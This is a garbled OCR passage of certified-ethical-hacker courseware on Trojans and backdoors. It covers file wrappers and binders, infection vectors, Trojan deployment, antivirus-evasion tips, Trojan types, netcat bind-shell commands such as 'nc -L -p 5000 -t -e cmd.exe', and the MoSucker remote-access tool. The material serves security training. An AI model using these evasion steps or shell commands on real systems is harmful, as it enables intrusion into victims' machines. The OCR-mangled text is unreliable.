When the user runs the wrapped EXE, it first installs the Trojan Trojan in the background background and then runs the wrapping application in the foreground
N The two programs are wrapped tog ether into a single file
V.
J
Attackers might send a birthday greeting that will install a Trojan as the user watches, for example, a birthday cake dancing across the screen
Source: http://www.objs.com Wrappers are used to bind the Trojan executable with a genuine-looking .EXE application such as games or office applications. When the user runs the wrapped EXE, it first installs the Trojan in the background and then runs the wrapping application in the foreground. The attacker can compress any (DOS/WIN) binary with tools such as petite.exe. This tool decompresses an EXE file (once compressed) on runtime. This makes it possible for the Trojan to get in virtually undetected, since most antivirus software is not able to detect the signatures in the file. The attacker can place several executables inside one executable, as well. These wrappers may also support functions such as running one file in the background while another one is running on the desktop. Technically speaking, wrappers can be considered another type of software "glueware" used to bind other software components together. A wrapper encapsulates into a single data source to make it usable in a more convenient fashion than the original unwrapped source. Users can be tricked into installing Trojan horses by being enticed or frightened. For instance, a Trojan horse might arrive in an email described as a computer game. When the user receives the mail, the description of the game may entice him or her to install it. Although it may, in fact, be a game, it may also be taking other action that is not readily apparent to the user, such as Module 06 Page 850
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
deleting files or mailing sensitive information to the attacker. In another instance, wan attacker sends a birthday greeting that will install a Trojan as the user watches, such as a birthday cake dancing across the screen.
8t l ( W ? Ch e s s . e x e
Filesize: Filesize: 90K
Tr o j a n . e x e
^
Filesiz Filesize: e: 20K
cness.exe Chess.exe ^
Filesize: File Filesi size ze:: 110K 110K 110K
FIGURE 6.5: Wrappers
Module 06 Page 851
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
Wrapper Covert Covert Programs Program s fci-Vrf*C6«T «TAlLM5I Crtf tfte teu
Hte5ce
CEH
[njarrio
vi TrOjaa.Net Advanced File Joiner
version 1.0 Ms.11' .1 1'. All I rl1.3j 1.3j q
rteujw!
1
Cr nll^ i C::t» t»
FJt5« FJt5«
|®IC ^Documtrt*aij
□c!D1c1ifrtt9rf[ jSir? jSir?1
I Hffi
'Cn' 'C n'W. W.'U 'Ui. i. »»*> 56
SC8 LAB’S
3««b
Pronessonal Malware Tod | !•Hr fl
rfrr.fvlit tndcx ) Crrptor Blndtr Downloado Downloadorr [ Spreader
Kriptomatik
Nome Nome
| Poll !
______
_________________________ ______________
SC&Ldb... C:\ C:\ D0CUmemts arid S(1Mir1Qs\Atl 111i .. No .1 ^ d‘ j 0 " " | cument$. . _j!to__
.
V
j
No
|
Advanced File Joiner Joiner |Theattachedfiles edfilesw weigh714KB
SCB LAB's - Professional Malware Malwa re Tool Tool Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
Wrapper Wrapper Covert Program s Kriptomatik Kriptomatik is a wrapper covert program that is designed to encrypt and protect files against crackers and antivirus software. It spreads via Bluetooth and allows you to burn CD/DVDs with Autorun. {
It has the following features: 0
Configure Configur e icons
0
Gather files
e
Posts
© Propagat Prop agation ion 0
Other Othe r features featur es such such as autostart, attributes, attr ibutes, encryp encryption tion,, etc etc..
Module 06 Page 852
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
File Name jJjIx jJjIxRA RAYMYPC-INST INSTAL ALL.M L.MSI Hb8thc Hb8 thc.e .exe xe
File Path
File Size
Inject Injec t To
C:\D C:\Doc ocu umentsan tsandSetti etting ngs\ks\k-AD ADes... C:\Documentsand Settings\ .,Des... .,Des. ..
4 Mb 379Kb
%apppat %apppath% h% %apppa %ap ppath% th%
Extract To %none% %none%
►
Plugin Count Count:: 0006
Status Stat us : all spread commands unchecked...
FIGURE 6.6: Kriptomatik screenshot
5-----® A dvan ced File Joiner Advanced File Joiner is software that is used to combine and join various files into a single file. If you have downloaded multiple pieces of a large file split into smaller files, you may easily join them together with this tool. For example, you can combine ASCII text files or combine video files such as MPEG files into a single file if and only if they are of same size, format, and encoding. This tool cannot be used effectively for joining a file format containing head information such as AVI, BMP, JPEG, and DOC files. So, for each of these types of file formats, you have to use specific software join program.
Module 06 Page 853
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
File List Anti Debugging Compile Ftes Ftes Event Event Logs About
|©|C:\Documents and Settings^ Settings^ V>esktop\Music.wav 58 nc:\Do nc: \Docume cuments nts and Settings\ \Desktop\iusion_b... 392 Kb
1 1
Add To File File Path:
Execute:
Yes
FIGURE 6.7: Advanced File Joiner Screenshot Screens hot
Module 06 Page 854
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
SCB LAB’ LAB’ss - Pro fessio nal M alw are Tool Professional Malware Tool is designed to encrypt (crypter), together (binder), download (downloader), and files spread (spread).
SC8 LAB'S Profiessw Profiesswial ial Malw alware are Too Tool t ,V - «■
Index | Crypter
Name
Binder
Downloader Downloader Spreader
Path
Execute
]SC B Lab... Lab... C:\DocumentsandSettings\Admi... *“ icuments and Settings\Admi... Add file ► Yes Execute Build! No
No No
Remove file
|The attached files weigh 714 KB
FIGURE 6.8: SCB LAB's - Professional Professional Malware Malwar e Tool Tool Screenshot
Module 06 Page 855
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
D ifferent Ways a Trojan ca n Get into into a Sy stem Instant Messenger applications
r
IRC (Internet Relay Chat)
Physical Access
\ 1
r 2
Legitimate "shrinkwrapped" software packaged by a disgruntled employee
3
Browser and email software bugs
4
Attachments
\ 5
r 6
Fake programs
\ 7
Untrusted sites and freeware software
CEH
r 8
NetBIOS (FileSharing)
\ 9
Downloading files, games, and screensavers from Internet sites
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on Is Strictly Stri ctly Prohibited. Prohibi ted.
Different W ays a Trojan Can Get into into a System Different access points are used by Trojans to infect the victim's system. With the help of these points, the Trojan attacks the target system and takes complete control over the system. They are as follows:
I n s t a n t M e s s e n g e r A p p li l i c a ti ti on on s The system can get infected via instant messenger applications such as ICQ or Yahoo Messenger. The user is at high risk while receiving files via the messenger, no matter from whom or from where. Since there is no file checking utility bundled with instant messengers, there is always a risk of infection by a Trojan. The user can never be 100% sure who is on the other side of the computer at any particular moment. It could be someone who hacked a messenger ID and password and wants to spread Trojans over the hacked friends list.
IRC (Intern (Intern et Re lay Chat) Chat)
tA
IRC is another method used for Trojan propagation. Trojan.exe can be renamed something like Trojan.txt (with 150 spaces).exe. It can be received over IRC and, in the DCC (Direct Client to Client), it will appear as •TXT. The execution of such files will cause infection. Most people do not notice that an application (.exe) file has a text icon. So before
Module 06 Page 856
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
such things are run, even if it is with a text icon; the extensions must be checked to ascertain that they are really .TXT files. 9
Do not not download any files that appear to to be free porn or or Internet Inter net software soft ware.. Novice computer users are often targets of these false offers, and many people on IRC are unaware of security. Users get infected from porn-trade channels, as they are not thinking about the risks involved—just how to get free porn and free programs.
irt ir t 1! P hy sica l Ac cess
LiJ 0
Restricting physical access is important for a computer's security. Example: 9
A user's friend wants want s to have physical access to his his system. The The user might might sneak into his friend's computer room in his absence and install a Trojan by copying the Trojan software from his disk onto the hard drive.
9
Autost Aut ostart art is another anot her way to infect a system while having physical physical access. access. When Wh en a CD is placed in the CD-ROM tray, it automatically starts with a setup interface. An example of the Autorun.inf file that is placed on such CDs:
[autorun] open=setup.exe icon=setup.exe 9
Trojan Troja n could be run easily easil y by running a real setup program.
9
Since many people do not know about this CD function, their the ir machine might get infected, and they would not understand what happened or how it was done.
9
The Autostart Autost art functionality functional ity should should be be turned off by doing the following: following :
Start Start > Sett Settin ings gs > Co Cont ntro roll Panel Panel -> Syst System em Properties ■) Settings
Devic Device e Manager ■> CDRO DROM
>
Once there, a reference to Auto Insert Notification will be seen. (It checks approximately once per second whether a CD-ROM has been inserted, or changed, or not changed.) To avoid any problems with this function, it should be turned off.
Brow ser and E m ail Softwa Software re Bugs Bug s Users do not update their software as often as they should, and many attackers take advantage of this well-known fact. Imagine an old version of Internet Explorer being used. A visit to a malicious site will automatically infect the machine without downloading or executing any program. The same scenario occurs while checking email with Outlook Express or some other software with well-known problems. Again, the user's system will be infected without even downloading an attachment. The latest version of the browser and email software should be used, because it reduces the risk of these variations.
Module 06 Page 857
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
9
Check the following sites to understand how dangerous these bugs are, all due to the use of an old version of the software: 9
http://www.guninski.com/ http://www.guninski.com/browsers.ht browsers.html ml
9
http://www.guninski.co http://www.guninski.com/netscape.ht m/netscape.html ml
F a k e P r o g r am am s 9
Attackers can easily lure a victim into downloading free programs that are suitable for their needs, and loaded with features such as an address book, access to check several POP3 accounts, and many other functions that make it even better than the currently used email client.
9
The victim downloads downl oads the program and marks marks it as TRUSTED, TRUST ED, so that the protection prote ction software fails to alert him or her of the new software being used. The email and POP3 account passwords are mailed directly to the attacker's mailbox without anyone noticing. Cached passwords and keystrokes can also be mailed. The aim is to gather ample information and send it to the attacker.
9
In some cases, an attacker may have complete access to a system, but what the attacker does depends on his or her ideas about how to use the hidden program's functions. While sending email and using port 25 or 110 for POP3, these could be used for connections from the attacker's machine (not at home, of course, but from another hacked machine) to connect and use the hidden functions they implemented in the freeware program. The idea here is to offer a program that requires a connection with a server be established.
9
Attackers thrive on creativity. Consider an example where a fake audio galaxy, which is a site for downloading MP3, is given. An attacker generates such a site by using 15-gb space on his system to place a larger archive there for the MP3. In addition, some other systems are also configured in the same fashion. This is done to fool users into thinking that they are downloading from other people who are spread across the network. The software acts as a backdoor and will infect thousands of naive users using ADSL connections.
9
Some fake programs have hidden codes, but still maintain a professional look. These websites link to anti-Trojan software, thus fooling users into trusting them. Included in the setup is readme.txt. This can deceive almost any user, so proper attention needs to be given to any freeware before it is downloaded. This is important because this dangerous method is an easy way to infect a machine via Trojans hidden in the freeware.
Module 06 Page 858
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
— .
S h r i n k - W r a p p e d S o ftw ft w a re
| Legitimate "shrink-wrapped" software package packaged d by a disgruntled emp loyee loye e can can contain Trojans.
Via A ttachm ttachm ents When unaware web users receive an email saying they will get free porn or free Internet access if they run an attached .exe file, they might run it without completely understanding the risk to their machines. 0
Example: 0
A user has a good good friend who is carrying out some research and wants to know about a topic related to his friend's field of research. He sends an email to his friend asking about the topic and waits for a reply. The attacker targeting the user also knows his friend's email address. The attacker will simply code a program to fake the email From: field and make it appear to be the friend's email address, but it will include the TROJANED attachment. The user will check his email, and see that his friend has answered his query in an attachment, and download and run it without thinking that it might be a Trojan. The end result is an infection.
0
Trash Trash email with the subject line, line, "Microso ft IE Update," Upda te," without viewing it. it.
0
Some email clients, such such as Outlook Express, Express, have bug bugs s that automati auto matically cally execute the attached files.
Untrusted Sites and Freeware Software 0 A site located at a free web we b space provider provide r or one just offering programs for illegal activities can be considered suspicious. 0
There are many underground sites such as Neurot Neu roticK icKat at Softw Sof twar are. e. It is highly risky risky to download any program or tool located on such a suspicious site that can serve as a
0
conduit condui t for a Trojan attack on a victim's victi m's computer. No matter matt er what software softw are you use, use, are you ready to take that risk?
0
Many Man y sites sites are available that have a professional look and contain huge archives. These sites are full of feedback forms and links to other popular sites. Users must take the time to scan such files before downloading them, so that it can be determined whether or not they are coming from a genuine site or a suspicious one.
0
Softwar Sof tware e such such as mIRC, mIRC, ICQ, ICQ, PGP, or any other othe r popular software soft ware must be downloaded downl oaded from its original (or official dedicated mirror) site, and not from any other websites that may have links to download supposedly the same software.
0
Webmaste Web maste rs of well-known well-known security portals, portals, who have vast archives with with various "hacking" programs, should be responsible for the files they provide and scan them often with anti-virus and anti-Trojan software to guarantee the site to be "free of Trojans and viruses." Suppose an attacker submits a program infected with a Trojan,
Module 06 Page 859
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
9
e.g., e.g., a UDP flooder, to the webmaster webm aster for the the archive; if the webmaster webm aster is not alert, the attacker may use the webmaster's irresponsibility to infect the site's files with a Trojan.
tJ
Users who deal with any kind kind of software softw are or web we b applicati appli cation on should scan their thei r systems on a daily basis. If they detect any new file, it should be examined. If any suspicion arises regarding the file, it must be forwarded to software detection labs for further analysis.
Q
It is easy to infect machines u usin sing g freew fre eware are programs. Free is not always the best" and hence these programs are hazardous for systems.
Net N etB B IO S (F ile il e S h a rin ri n g ) If port 139 on the system is open, i.e., file sharing is enabled, it can be used by others to access the system, install trojan.exe, and modify a system's file. 9
The attacker can also use a DoS DoS attack to shut down the system and force a reboot, so the Trojan can restart itself immediately. To block file sharing in the WinME version, go to: 9
Start > Settings Settings -> Control Control Panel
Netwo rk > File and Print Sharing Sharing
9
Uncheck the boxes boxes there. This This will prevent NetB IOS abuse. abuse.
Downloading Downloading files, games, and screensavers from Internet sites can be dangerous.
Module 06 Page 860
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
How How to Deploy Dep loy a Troja T rojann
c EH
(crtifwd IUmjI KmIm
Majo r Trojan Trojan Attack Paths: » User clicks clicks on the malicious link 8 User opens opens malicious email attachments
Attacker installs the Trojan infecting his machine
Trojan Trojan Serv er
(Russia) Trojan is sent to the victim
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on isStrictly Stri ctly Prohibited.
How to De ploy a T rojan A Trojan is the means by which an attacker can gain access to the victim's system. In order to gain control over the victim's machine, an attacker creates a Trojan server, and then sends an email to a victim containing a link to the Trojan server. Once the victim clicks on the link sent by the attacker, it connects him or her directly to the Trojan server. The Trojan server sends a Trojan to the victim system. The attacker installs the Trojan, infecting the victim's machine. As a result, victim is connected to the attack server unknowingly. Once the victim connects to an attacker server, the attacker takes complete control over the victim's system and performs any action the attacker chooses. If the victim carries out any online transaction or purchase, then the attacker can easily steal sensitive information such as credit card details, account information, etc. In addition, attackers can also use the victim's machine as the source for launching attacks on other systems. Computers typically get infected by users clicking on a malicious link or opening an email attachment that installs a Trojan on their computers that serves as a back door to criminals who can then command the computer to send spam email.
Module 06 Page 861
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Computers typically get infected by clicking on a malicious link or opening an e-mail attachment that installs a Trojan on their computers that serves as a back door to criminals w ho can then command the computer to send spam email
ru Ed* vi** Toob h»sm o« noo &
Bi *!**
x
HfftyAl Hffty Al fat•ft6 •ft6
Orlrfa
O
O I ■vD
Subject : Apo«A**a0f• Odorm ?27867
Apple Store Call 1-800-MY-APPLE Dear Customer
4
Victim
Attacker installs the Trojan infecting his machine
The Trojan connects to the attack server
Link to Trojan Server
xlfnake changes to yelr To view the most up-to-date status 8nd| Apple Online Store order, visit online y|ur Qrc^rSiatus. | You car. aJso contact Apple Stor e Cust omer Se rvicc a: 1-800-576-2775 orvu t cniat for mere nfo:1r.aCoc.
Immediately connects to Trojan server ser ver in Russia
Attacker sends an email to victim containing link to Trojan server
Internet
la
Troj an Server
(Russia)
Trojan Is sent to the victim
FIGURE 6.9: Diagrammatical representation of deploying a Trojan in victims system
Module 06 Page 862
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
E vading A nti-Vi nti-Virus rus T ech niqu es
Break the Trojan file into multiple pieces and zip them as single file
Never use Trojans downloaded from the web (antivirus can detect these easily)
ALWAYS write your own Trojan and embed it into an application
Change the content of the Trojan using hex editor and also change the checksum and encrypt the file
Change Trojan's syntax: «
Convert an EXE to VB script script
e
Change .EXE extension to .DOC.EXE, .PPT.EXE or .PDF.EXE (Windows hide "known extensions", by default, so it shows up only .DOC, .PPT and .PDF)
Copyright Copyri ght © by EG-Gouncil . All Rights Jte$ervfei;Reproduction is Strictly Prohibited. Prohibited.
Evading Antivir Anti virus us Tech nique s The following are the various techniques used by Trojans, viruses, and worms to evade most most of antivirus software: 1.
Never use Trojans downloade down loaded d from the web (antivirus (antiv irus detects these easily).
2. W rite ri te your own Trojan and and embed it into an application. applicati on. 3. Change the Trojan's Troj an's syntax: 0
Convert Conve rt an EXE to VB script
0
Conver Con vertt an EXE to a DOC DOC file
0
Convert Conve rt an EXE to a PPT file
4. Change the checksum. 5. Change the conten con tentt of the Trojan using a hex editor. editor . 6.
Break the Trojan Trojan file into multiple pieces.
Module 06 Page 863
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
So far, we have discussed various concepts of Trojans and the way they infect the system. Now we will discuss various types of Trojans that are used by attackers for gaining sensitive information through various means.
J
^—
Trojan Concepts
Countermeasures
Trojans Infection
Anti-Trojan Software
Types Types of Trojan Trojans s
y )
Penetrati on Testing Testing
v -
I 1 Troj Troja an Det Detec ecttion ion
This section covers various types of Trojans such as command-shell Trojans, document Trojans, email Trojans, botnet Trojans, proxy server Trojans, and so on. Module 06 Page 864
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
T y p e s o f T r o jjaa n s / i
V NC NC Trojan
\ : :
/*HTTP/HTTPS\ /*ICMP /*ICMP \ Trojan : ; Trojan
CEH /D ata Hiding Hiding*. *.
:
;
Trojan
a
/*Dest /*Destruc ructiv tive**. e**.
: .
Trojan
:
/*Docu ment
!
Trojan
a
Types of Troj Trojans ans Various types of Trojans that are intended for various purposes are available. The following is a list of types of Trojans: 0
VNC Trojan
0
Proxy Server Ser ver Trojan
0
HTTP/HTTPS Trojan
0
Botnet Botne t Trojan Trojan
0
ICMP Trojan Trojan
0
Covert Channel Trojan
0
Command Shell Trojan
0
SPAM Trojan Trojan
0
Data Hiding Trojan
0
Credit Card Trojan
0
Destructive Destructi ve Trojan
0
Defacement Trojan Trojan
©
Docume Doc ument nt Trojan
0
E-banking E-banking Trojan
0
GUI Trojan
0
Notification Notificat ion Trojan
0
FTP Trojan Troj an
0
Mobile Trojan Trojan
0
E-mail E-mail Trojan Troj an
0
MAC OS X Trojan
0
Remote Remot e Access Trojan
Module 06 Page 865
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
C om m an d Shell Shell T rojans rojan s
CEH
J
Comm Comman and d she shell ll Tro Troja jan n gives gives remote remote cont control rol of of a comma command nd shell shell on a victim victim's 's mach machine ine
J
Troj Trojan an server server is is ins instal talled led on the victi victim's m's mach machine ine,, whic which h opens opens a port port for for attacker attacker to con conne nect. ct. The client is installed on the attacker's machine, which is used to launch a command shell on the victim's machine
Command Shell Trojans The command shell Trojan gives remote control of a command shell on a victim's machine. The Trojan server is installed on the victim's machine, which opens a port for the attacker attack er to connect. The client is installed on the attack at tacker's er's machine, machine , which is used used to launch a command shell on the victim's machine.
C: > nc
C: > nc - L - p - t - e cmd. exe exe FIGURE 6.10: Attacker launching command shell Trojan in victim's machine
Module 06 Page 866
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
C om m an d Shell Troj Tr ojan an:: N etcat
c:\>nc.exe
-h
[ 1.10 NT] conn ect to s canew h e r e : listen for inbound:
nc nc
options: -d
d e t a c h f r o m c on s ol e ,
- e pr p r og og - g g at at ew ew ay ay —G nu m -h -i 1
CEH
se se c s
] options] hostname port[s] [ports[ ... -1 -p por t [options] [hostname] [port] [port] s t eal th m od e
i nb nb ou ou nd nd pr pr og og ra ra m to to e xe xe c [ d a n g e r o u s ! ! ] s ou ou rc rc ee- ro ro ut ut in in g h o p p o in in t [s] , u p t o 8 so ur ce -r ou ti ng poi nte r:
4, 8,
12,
—
...
this cruft d el el ay ay in in t e r v al al fo f o r li li n e s se se nt , po p o rt rt s l i s t e n m o d e , fo fo r i n b o u n d c o n n e c t s
sc s c a nn nn ed ed
-L -n
listen harder, re-listen on socket close nu me ri c - o nl y IP a d d r e s s e s , n o DNS
-o f i le -p p o r t
h e x du m p o f t raffi c lo cal p o r t number
-r -a a d d r -t -u
randomize local and remote ports lo cal sour ce addr ess answer TELNET negotiation U D P m ode
- w s ec s -z
verbose [use [use twice to be more verbose] t im im e ou ou t f o r c o nn nn ec ec ts ts a nd nd f i n a l n et et r e a d s zero-l/O mode [used for scanning] scanning]
po rt nu mb er s ca n be individual or ranges: m n
[inclusive]
C:\>
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on is Strictly Stri ctly Prohibited. Prohibi ted.
C om m and Shel Sh elll Trojan: Trojan: Netcat Using Netcat, an attacker can set up a port or a backdoor that will allow him or her to telnet into a DOS shell. With a simple command such as C:\>nc -L -p 5000 -t -e cmd.exe, the attacker can bind port 5000. With Netcat, the user can create outbound or inbound connections, TCP or UDP, to or from any port. It provides for full DNS forward/reverse checking, with appropriate warnings. Additionally, it provides the ability to use any local source port, any locally configured network source address, and it comes with built-in port-scanning capabilities. It has a built-in loose source-routing capability and can read command-line arguments from standard input. Another feature is the ability to let another program respond to inbound connections (another program service established connections). In the simplest usage, usage, nc host port" creates cre ates a TCP connection to the given port on the given target host. The standard input is then sent to the host, and anything that comes back across the connection is sent to the standard output. This continues indefinitely, until the network side of the connection shuts down. This behavior is different from most other applications, which shut everything down and exit after an end-of-file on the standard input. Netcat can also function as a server by listening for inbound connections on arbitrary ports, and then doing the same reading and writing. With minor limitations, Netcat does not really care if it runs in client or server mode; it still moves data back and forth until there is none left. In either mode, shutdown can be forced after a configurable time of inactivity on the network side.
Module 06 Page 867
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
Features: 0
Outbound or inbound connections, connectio ns, TCP or UDP, to or from any port
0
Full Full DNS for forward ward/re /revers verse e checking, checking, with appropri appr opriate ate warnings
0
Ability Abilit y to use use any local local source port
0
Ability Abilit y to use use any locally locally configured netwo rk source address address
0
Built-in Built-in port-scannin port-scanning g capabilities, with randomizer
0
Built-in Built-in loose source-routing capability capabil ity
0
Can read command-line arguments from standard input
0
Slow-send mode, one line ever ev ery y N seconds
0
Hex Hex dump of transmitted transm itted and received receive d data
0
Optional ability to let another anoth er program service establish connections connectio ns
0
Optional Opti onal telnet-o tel net-optio ptions ns respo re sponde nderr using the comman co mmand d nc -I -p 23 -t -e cmd.exe cmd.e xe
0
W h ere er e 23 is is the port for telnet, teln et, -I option opti on is to listen, -e option optio n is to execute, exe cute, -t -t option optio n tells Netcat to handle any telnet negotiation the client might expect
Netcat is a utility used for reading and writing the networks that support TCP and UDP protocols. It is a Trojan that is used to open either the TCP or UDP port on a target system and hackers with the help of Telnet gain the access over the system. Command Prompt c: \ >nc. exe exe - h [vl.10 NT] connect to somewhere : listen listen for for inbound: inbound: options: -d -e p r o g at ew ewa y -g g at -G n u m -h - i se c s -1 -L -n - o f i le P port -r -s a d d r -t -u -v - w se c s -z
nc [-opti [-options] ons] hostna me port[s] [ports] [ports] ... nc -1 -p port [op [opti tion ons] s] [host [hostna name me] ] [port] detac h from console, console, stea lth mode i n b o u n d p r o g r a m to ex ec [d [dangerous!!] s ou ou rc rc ee- ro ro ut ut in in g h op op po po in in t[ t[ s] s] , u p t o 8 s o u r c e - r o u t i n g pointer: 4, 8, 12, ... this cr uft d e l a y int er v al f or lin es s en en t, t, p o rt rt s sca n n ed listen mo de , for inbound connects listen harder, harder, re-listen on socket close numeric-only IP addresses, no DNS hex dump of traffic loca l po rt numb er r a nd o m iz e loc a l a n d re m ot e p o r t s l oc a l so u r ce addre ss answer TEI2 TEI2JE JET T negotia tion UDP m od e verbos e [use twice to be more verbose] verbose] t i m e o u t f o r c o n n e c t s a n d f i n a l n e t r ea d s z er o - l / O m o d e [ [u us e d f or sc a n n i n g]
por t n umbe rs can b e ind ivid ual or ranges: m- n
[inclusive]
C:\>
FIGURE 6.11: 6.11: Netcat screenshot
Module 06 Page 868
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
G UI U I T r o ja ja n : M o S u c k e r
MoSucker 3.0 Selected Server:
|z:\C&tv8Module 06Trojans and Backdoors\Trojans Type Server Serv er ID: Cypher Key: Victim's Name: Server Serv er Name(s): Extension(*): Cormecbon-eort:
[
£
Close
]
O
15017MQWEY3C:4264 7MQWEY3C: 4264200TPGNDEVC TWQPCUL25873IVFCSJQK137 TWQPCUL25873IVF CSJQK13761
1
|vk:t m
]
kerne!32,msc0nfig,vvinexec32,netconfig exe,p!f t>at,(i,jpe,com,bpq,xtr,txp,
0
|4288|
W Preve nt same server multHnfecbons (recommended)
You may select a windows icon to assooate with your custom file extension/s.
Sead
Save
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on is Strictly Stri ctly Prohibited. Prohibi ted.
GUI Trojan: MoSucker Source: http://www.dark-e.com
MoSucker is a Visual Basic Trojan. MoSucker's edit server program lets the infection routine be changed and notification information set. MoSucker can auto load with the system.ini and/or the registry. Unlike any other Trojan, MoSucker can be set to randomly choose which method to auto load. It can notify cell phones via SMS in Germany only. MuSucker's edit server can gain X number of kilobytes (X is either a static number or it is random each time). The standard error message for MoSucker is "Zip file is damaged, truncated, or has been changed since it was created. If you downloaded this file, try downloading again." Here is a list of file names MoSucker suggests to name the server: MSNETCFG.exe, unin0686.exe, Calc.exe, HTTP.exe, HTTP.exe, MSWINUPD.exe, Ars.exe, NETUPDATE.exe, and Register.exe. Server Features: 0
Chat with victim
Q
Clipboard Clipboar d manager manag er
© Close/remove Close/remov e server e
Control mouse
9
Crash Crash System File Manager Manag er
Module
06 Page 869
Ethical Hacking and Countermeasures Copyright © by
EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Exam 312-50 Certified Ethical Hacker
Ethical Hacking and Countermeasures Trojans and Backdoors
0
Get passwords entered enter ed by user, system info
0
Hide/Show Hide/Sh ow start button, system tray, taskbar
0
Keylogger
0
Minimize all all windows wind ows
0
Open/close CD-ROM CD-ROM drive
0
Ping server
0
Pop-up Pop-up startmenu
0
Process manger
0
Shutdown/Reboot/Standby/Logoff/Dos Shutdown/Reboot/Standby/Logoff/Dos mode server
0
System keys on/off
0
Wind ow manager manager About
| Opti Option ons s | S3
_
£ Nt Q
Misc stuff Information File related System
5
' /
f t ;
Spy related Fun stuff I
version 3.0
Fun stuff II Live capture capture
u iw i u .m a s u c k c r . t h
FIGURE 6.12: 6.12: MoSucker screenshot
Module 06 Page 870
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
*
MoSucker 3.0 Selected Server
|z:\CEHv8 Module Module 06 Trojans and Backdoors\Trojans Backdoors\Trojans Type
Name/Port Password Autostart
Server ID: Cypher Key:
Notification 1
Victim's Name:
Notification 2
Server Name(s): Name(s):
Options
Extension Extension(s):
Events Bind Files Keylogger
Connection-gort:
C cl
Close
|
O
1501704QWEYX:4264200TPGNDEVC TWQPCUL25873IVFCSJQK13761 Victim kemel32 msc0nfigrwinexec32,netconfig exe,pif,bat,dli jpe comrbpq,xtr,txp, 4288|
[/ Preve Pr event nt same server ser ver multi-infec multi-infection tions s (recommended) (recommended)
Plug-ins/Kill Fake Error
<
>
You may select a windows icon to associate with your custom file extension/s.
File Properties Icons
Read
Save
Exit
FIGURE FIGU RE 6.13: 6.13: MoSucker MoS ucker showing victim's victim' s name and and connection port
Module 06 Page 871
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
GUI GUI Troja Trojan: n: Jum per an d Biod ox
CEH
